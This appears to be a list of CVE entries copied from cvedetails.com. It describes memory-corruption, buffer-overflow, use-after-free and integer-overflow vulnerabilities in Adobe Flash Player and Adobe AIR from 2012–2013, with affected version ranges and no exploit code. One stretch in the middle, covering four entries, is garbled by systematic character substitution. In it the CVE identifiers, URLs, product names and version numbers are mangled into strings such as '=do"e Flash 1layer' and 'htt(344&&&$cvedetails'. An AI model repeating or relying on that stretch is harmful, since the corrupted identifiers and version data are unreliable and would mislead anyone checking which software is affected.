    Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x; Adobe AIR before 3.6.0.6090; Adobe AIR SDK before 3.6.0.6090; and Adobe AIR SDK & Compiler before 3.6.0.6090 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.


    CVE-2013-1370 http://www.cvedetails.com/cve/CVE-2013-1370/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-1369 http://www.cvedetails.com/cve/CVE-2013-1369/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-1368 http://www.cvedetails.com/cve/CVE-2013-1368/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-1367 http://www.cvedetails.com/cve/CVE-2013-1367/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-1366 http://www.cvedetails.com/cve/CVE-2013-1366/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.


    CVE-2013-1365 http://www.cvedetails.com/cve/CVE-2013-1365/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-0650 http://www.cvedetails.com/cve/CVE-2013-0650/

    Use-after-free vulnerability in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x; Adobe AIR before 3.6.0.6090; Adobe AIR SDK before 3.6.0.6090; and Adobe AIR SDK & Compiler before 3.6.0.6090 allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2013-0649 http://www.cvedetails.com/cve/CVE-2013-0649/

    Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

    CVE-2013-0648 http://www.cvedetails.com/cve/CVE-2013-0648/

    Unspecified vulnerability in the ExternalInterface ActionScript functionality in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

    CVE-2013-0647 http://www.cvedetails.com/cve/CVE-2013-0647/

    Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-0638.

    CVE-2013-0646 http://www.cvedetails.com/cve/CVE-2013-0646/

    Integer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x; Adobe AIR before 3.6.0.6090; Adobe AIR SDK before 3.6.0.6090; and Adobe AIR SDK & Compiler before 3.6.0.6090 allows attackers to execute arbitrary code via unspecified vectors.


    CVE-2013-0645 http://www.cvedetails.com/cve/CVE-2013-0645/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-0644 http://www.cvedetails.com/cve/CVE-2013-0644/

    Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0649 and CVE-2013-1374.

    CVE-2013-0643 http://www.cvedetails.com/cve/CVE-2013-0643/

    The Firefox sandbox in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, does not properly restrict privileges, which makes it easier for remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

    CVE-2013-0642 http://www.cvedetails.com/cve/CVE-2013-0642/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, and CVE-2013-1373.

    CVE-2013-0639 http://www.cvedetails.com/cve/CVE-2013-0639/

    Integer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2013-0638 http://www.cvedetails.com/cve/CVE-2013-0638/

    Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-0647.


    CVE-2013-0637 http://www.cvedetails.com/cve/CVE-2013-0637/

    Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allow attackers to obtain sensitive information via unspecified vectors.

    CVE-2013-0634 http://www.cvedetails.com/cve/CVE-2013-0634/

    Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted SWF content, as exploited in the wild in February 2013.

    CVE-2013-0633 http://www.cvedetails.com/cve/CVE-2013-0633/

    Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

    CVE-2013-0630 http://www.cvedetails.com/cve/CVE-2013-0630/

    Buffer overflow in Adobe Flash Player before 10.3.183.50 and 11.x before 11.5.502.146 on Windows and Mac OS X, before 10.3.183.50 and 11.x before 11.2.202.261 on Linux, before 11.1.111.31 on Android 2.x and 3.x, and before 11.1.115.36 on Android 4.x; Adobe AIR before 3.5.0.1060; and Adobe AIR SDK before 3.5.0.1060 allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2013-0504 http://www.cvedetails.com/cve/CVE-2013-0504/

    Buffer overflow in the broker service in Adobe Flash Player before 10.3.183.67 and 11.x before 11.6.602.171 on Windows and Mac OS X, and before 10.3.183.67 and 11.x before 11.2.202.273 on Linux, allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2012-5678 http://www.cvedetails.com/cve/CVE-2012-5678/

    Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x; Adobe AIR before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X; and Adobe AIR SDK before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

    CVE-2012-5677 http://www.cvedetails.com/cve/CVE-2012-5677/

    Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x; Adobe AIR before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X; and Adobe AIR SDK before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X allows attackers to execute arbitrary code via unspecified vectors.


    CVE-2012-5676 http://www.cvedetails.com/cve/CVE-2012-5676/

    Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on Windows, before 10.3.183.48 and 11.x before 11.5.502.136 on Mac OS X, before 10.3.183.48 and 11.x before 11.2.202.258 on Linux, before 11.1.111.29 on Android 2.x and 3.x, and before 11.1.115.34 on Android 4.x; Adobe AIR before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X; and Adobe AIR SDK before 3.5.0.880 on Windows and before 3.5.0.890 on Mac OS X allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2012-5673 http://www.cvedetails.com/cve/CVE-2012-5673/

    Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 has unknown impact and attack vectors.

    CVE-2012-5287 http://www.cvedetails.com/cve/CVE-2012-5287/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5286 http://www.cvedetails.com/cve/CVE-2012-5286/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5285 http://www.cvedetails.com/cve/CVE-2012-5285/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5280 http://www.cvedetails.com/cve/CVE-2012-5280/

    Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, and CVE-2012-5277.

    CVE-2012-5279 http://www.cvedetails.com/cve/CVE-2012-5279/

    Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.


    CVE-2012-5278 http://www.cvedetails.com/cve/CVE-2012-5278/

    Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allow attackers to bypass intended access restrictions and execute arbitrary code via unspecified vectors.

    CVE-2012-5277 http://www.cvedetails.com/cve/CVE-2012-5277/

    Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, and CVE-2012-5280.

    CVE-2012-5276 http://www.cvedetails.com/cve/CVE-2012-5276/

    Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5274, CVE-2012-5275, CVE-2012-5277, and CVE-2012-5280.

    CVE-2012-5275 http://www.cvedetails.com/cve/CVE-2012-5275/

    Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5274, CVE-2012-5276, CVE-2012-5277, and CVE-2012-5280.

    CVE-2012-5274 http://www.cvedetails.com/cve/CVE-2012-5274/

    Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on Windows and Mac OS X, before 10.3.183.43 and 11.x before 11.2.202.251 on Linux, before 11.1.111.24 on Android 2.x and 3.x, and before 11.1.115.27 on Android 4.x; Adobe AIR before 3.5.0.600; and Adobe AIR SDK before 3.5.0.600 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2012-5275, CVE-2012-5276, CVE-2012-5277, and CVE-2012-5280.

    CVE-2012-5272 http://www.cvedetails.com/cve/CVE-2012-5272/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.


    CVE-2012-5271 http://www.cvedetails.com/cve/CVE-2012-5271/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5270 http://www.cvedetails.com/cve/CVE-2012-5270/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5269 http://www.cvedetails.com/cve/CVE-2012-5269/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5268 http://www.cvedetails.com/cve/CVE-2012-5268/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5267 http://www.cvedetails.com/cve/CVE-2012-5267/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5266 http://www.cvedetails.com/cve/CVE-2012-5266/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.


    CVE-2012-5265 http://www.cvedetails.com/cve/CVE-2012-5265/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5264 http://www.cvedetails.com/cve/CVE-2012-5264/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    C)-2012-!2#" htt(344&&&$cvedetails$com4cve4C)-2012-!2#"4

    =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s and 9ac S 0

    "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on =ndroid $.8 and +.80and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e =IR SDK "e!ore

    +.C.%.$&% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG

    via unspeci!ied vectors0 a di!!erent vulnera"ility than other Flash 1layer memory corruption :2slisted in =1S(&$'$$.

    C)-2012-!2#2 htt(344&&&$cvedetails$com4cve4C)-2012-!2#24

    (u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s

    and 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on

    =ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e

    =IR SDK "e!ore +.C.%.$&% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 adi!!erent vulnera"ility than other Flash 1layer "u!!er over!lo- :2s listed in =1S(&$'$$.

    C)-2012-!2#1 htt(344&&&$cvedetails$com4cve4C)-2012-!2#14

    =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s and 9ac S 0

    "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on =ndroid $.8 and +.80

    and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e =IR SDK "e!ore+.C.%.$&% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG

    via unspeci!ied vectors0 a di!!erent vulnera"ility than other Flash 1layer memory corruption :2s

    listed in =1S(&$'$$.

    C)-2012-!2#0 htt(344&&&$cvedetails$com4cve4C)-2012-!2#04

    (u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s

    and 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e

    =IR SDK "e!ore +.C.%.$&% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 a

    di!!erent vulnera"ility than other Flash 1layer "u!!er over!lo- :2s listed in =1S(&$'$$.


    CVE-2012-5259 http://www.cvedetails.com/cve/CVE-2012-5259/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5258 http://www.cvedetails.com/cve/CVE-2012-5258/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5257 http://www.cvedetails.com/cve/CVE-2012-5257/

    Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than other Flash Player buffer overflow CVEs listed in APSB12-22.

    CVE-2012-5256 http://www.cvedetails.com/cve/CVE-2012-5256/

    Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on Windows and Mac OS X, before 10.3.183.29 and 11.x before 11.2.202.243 on Linux, before 11.1.111.19 on Android 2.x and 3.x, and before 11.1.115.20 on Android 4.x; Adobe AIR before 3.4.0.2710; and Adobe AIR SDK before 3.4.0.2710 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than other Flash Player memory corruption CVEs listed in APSB12-22.

    CVE-2012-5255 http://www.cvedetails.com/cve/CVE-2012-5255/

